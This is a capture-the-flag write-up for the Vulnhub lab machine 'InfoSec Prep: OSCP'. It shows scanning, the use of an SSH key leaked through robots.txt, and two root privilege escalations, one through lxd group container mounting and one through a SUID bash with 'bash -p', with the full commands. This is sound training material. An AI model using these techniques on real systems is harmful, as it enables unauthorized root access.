Vulnhub: InfoSec Prep: OSCP

Book card

This is a writeup about a vulnhub machine InfoSec Prep This box is an really easy box in order to make a small selection for entering a give away for a 30d voucher to the OSCP Lab, Lab materials, and an exam attempt. The box was created by FalconSpy and publish on July 11 2020. It involves a robots.txt file, some base64 an SSH key, lxd and a SUID binary.

User

nmap

We start with an nmap scan. Only the ports 22 (SSH), 80 (HTTP) and 33060 (??) are open.

# Nmap 7.80 scan initiated Sat Jul 18 04:31:34 2020 as: nmap -p- -sSV -oN nmap_tcp 192.168.1.200
Nmap scan report for oscp.home (192.168.1.200)
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=7/17%Time=5F1161EE%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

On port 80 we found a classic wordpress blog. We run a wpscan on it but nothing pop out. We run a nikto on the box. It found an entry /secret.txt on the robots.txt file.

kali@kali:~$ nikto -h 192.168.1.200
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.200
+ Target Hostname:    192.168.1.200
+ Target Port:        80
+ Start Time:         2020-07-18 08:12:31 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "10.244.168.1".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.1.200http://10.244.168.1/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
<SNIP>

The file is a RSA private key encoded in base64. Once decoded we store it in a ssh_key file.

We just need to know what the user is. We continue to browse the website and display the admin user page (http://192.168.1.200/index.php/author/admin/) it state that the only use on the box is oscp so we connect on SSH as oscp using SSH key.

kali@kali:~$ ssh oscp@192.168.1.200 -i id_rsa 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
<SNIP>
-bash-5.0$

Root

I found two ways to get root. The first one (unintended) with lxc and the second one with an SUID binary.

lxc

Once we have a shell on the box we run id and found out that we are part of the lxd group. This is a know privilege escalation.

~ # -bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

When we try to run the lxc (or lxd) command we got an error command not found so we run a quick search in order to find the binary path.

-bash-5.0$ lxc
-bash: lxc: command not found
-bash-5.0$ find / -name 'lxc' 2> /dev/null
/snap/lxd/16100/bin/lxc
/snap/lxd/16100/commands/lxc
/snap/lxd/16100/lxc
/snap/lxd/16044/bin/lxc
/snap/lxd/16044/commands/lxc
/snap/lxd/16044/lxc
/snap/bin/lxc
/usr/share/bash-completion/completions/lxc

Then we build clone the alipne image and build it on our system (as it require root permission), then we transfer it to the box.

kali@kali:~$ git clone https://github.com/saghul/lxd-alpine-builder
kali@kali:~$ cd lxd-alpine-builder/
kali@kali:~lxd-alpine-builder$ sudo ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
<SNIP>
18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
kali@kali:~lxd-alpine-builder$ scp -i id_rsa alpine-v3.12-i686-20200717_0532.tar.gz oscp@192.168.1.200:
alpine-v3.12-i686-20200717_0532.tar.gz

Then we try to import the image in the box. We first need to initialize lxd.

-bash-5.0$ /snap/bin/lxc image import ./alpine-v3.12-i686-20200717_0532.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

Image imported with fingerprint: dcf00931e4bc5f738cb5d843593151420e4c27cf7c8152a3b91ec6c75bf4db6d
-bash-5.0$ /snap/bin/lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
Error: No storage pool found. Please create a new storage pool
-bash-5.0$ /snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
<SNIP>
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:

Then we just boot the image, mounting the host disk and access the root flag.

-bash-5.0$ /snap/bin/lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
-bash-5.0$ /snap/bin/lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
-bash-5.0$ /snap/bin/lxc  start mycontainer
-bash-5.0$ /snap/bin/lxc exec mycontainer /bin/sh
~ # ls /mnt/root/
bin         cdrom       etc         lib         lib64       lost+found  mnt         proc        run         snap        swap.img    tmp         var
boot        dev         home        lib32       libx32      media       opt         root        sbin        srv         sys         usr
~ # ls /mnt/root/root/
fix-wordpress  flag.txt       snap
~ # ls /mnt/root/root/flag.txt
/mnt/root/root/flag.txt
~ # cat /mnt/root/root/flag.txt
d73b04b0e696b0945283defa3eee4538

SUID bash

We can also list the SUID binary and found that /usr/bin/bash is SUID.

-bash-5.0$ find / -uid 0 -perm -4000 -type f 2>/dev/null
<SNIP>
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

We just use the -p option in order to have a shell as root.

-bash-5.0$ bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
bash-5.0# cat /root/flag.txt
d73b04b0e696b0945283defa3eee4538

Wrapping up

The box was really easy, a nice job from FalconSpy as it will allow "beginners" to enter the give away.